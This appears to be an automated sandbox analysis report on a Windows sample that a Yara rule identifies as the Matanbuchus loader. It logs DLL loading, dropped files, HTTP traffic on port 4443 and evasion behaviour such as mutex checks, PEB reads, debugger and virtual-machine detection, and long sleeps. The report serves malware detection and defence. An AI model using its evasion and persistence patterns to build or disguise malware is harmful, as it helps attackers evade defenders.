Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Yara detected Matanbuchus

Data Obfuscation

Source: Yara match	File source: 5.2.rundll32.exe.4930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.6b600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.6b600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6c310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3322347292.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\8f08\724536\724536.winmd, type: DROPPED

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB41116 push ecx; ret	5_2_7FB41129
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F80B37E push cs; retf 0002h	7_2_7F80B37F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F841116 push ecx; ret	7_2_7F841129
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F12B37E push cs; retf 0002h	11_2_7F12B37F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F161116 push ecx; ret	11_2_7F161129

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\silver\libcurl.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICC41.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICCA1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICA2D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\8f08\724536\724536.winmd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICC71.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICC41.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICCA1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICA2D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICC71.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\8f08\724536\724536.winmd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49829

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_5-45405

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_5-45936

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetAdaptersInfo,

5_2_7FB2B260

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSICC41.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSICCA1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSICA2D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\8f08\724536\724536.winmd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSICC71.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 5.4 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 3.0 %

Source: C:\Windows\System32\msiexec.exe TID: 6528	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6436	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6436	Thread sleep time: -7020000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_7FB57CC4 FindFirstFileExW,

5_2_7FB57CC4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_7FB2ADB0 GetSystemInfo,

5_2_7FB2ADB0

Source: C:\Windows\SysWOW64\rundll32.exe

Thread delayed: delay time: 130000

Source: rundll32.exe, 00000005.00000002.3321908907.00000000027CE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

graph_5-45378

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_7FB41417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_7FB41417

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB09830 mov edx, dword ptr fs:[00000030h]	5_2_7FB09830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB13740 mov ecx, dword ptr fs:[00000030h]	5_2_7FB13740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB13740 mov ecx, dword ptr fs:[00000030h]	5_2_7FB13740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB13740 mov eax, dword ptr fs:[00000030h]	5_2_7FB13740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB13740 mov edx, dword ptr fs:[00000030h]	5_2_7FB13740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB27660 mov ecx, dword ptr fs:[00000030h]	5_2_7FB27660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2B260 mov ecx, dword ptr fs:[00000030h]	5_2_7FB2B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2B260 mov eax, dword ptr fs:[00000030h]	5_2_7FB2B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2B260 mov edx, dword ptr fs:[00000030h]	5_2_7FB2B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2B260 mov eax, dword ptr fs:[00000030h]	5_2_7FB2B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2B260 mov ecx, dword ptr fs:[00000030h]	5_2_7FB2B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2ADB0 mov edx, dword ptr fs:[00000030h]	5_2_7FB2ADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3CDA9 mov eax, dword ptr fs:[00000030h]	5_2_7FB3CDA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3CDA9 mov ecx, dword ptr fs:[00000030h]	5_2_7FB3CDA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB30C00 mov ecx, dword ptr fs:[00000030h]	5_2_7FB30C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2E690 mov ecx, dword ptr fs:[00000030h]	5_2_7FB2E690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2E1C0 mov edx, dword ptr fs:[00000030h]	5_2_7FB2E1C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov edx, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov edx, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB25EC0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB25EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB37D90 mov ecx, dword ptr fs:[00000030h]	5_2_7FB37D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB37D90 mov edx, dword ptr fs:[00000030h]	5_2_7FB37D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB37D90 mov eax, dword ptr fs:[00000030h]	5_2_7FB37D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB37D90 mov ecx, dword ptr fs:[00000030h]	5_2_7FB37D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3DDF9 mov eax, dword ptr fs:[00000030h]	5_2_7FB3DDF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov edx, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB15CD0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB15CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB29A90 mov eax, dword ptr fs:[00000030h]	5_2_7FB29A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov edx, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]	5_2_7FB1DAC0
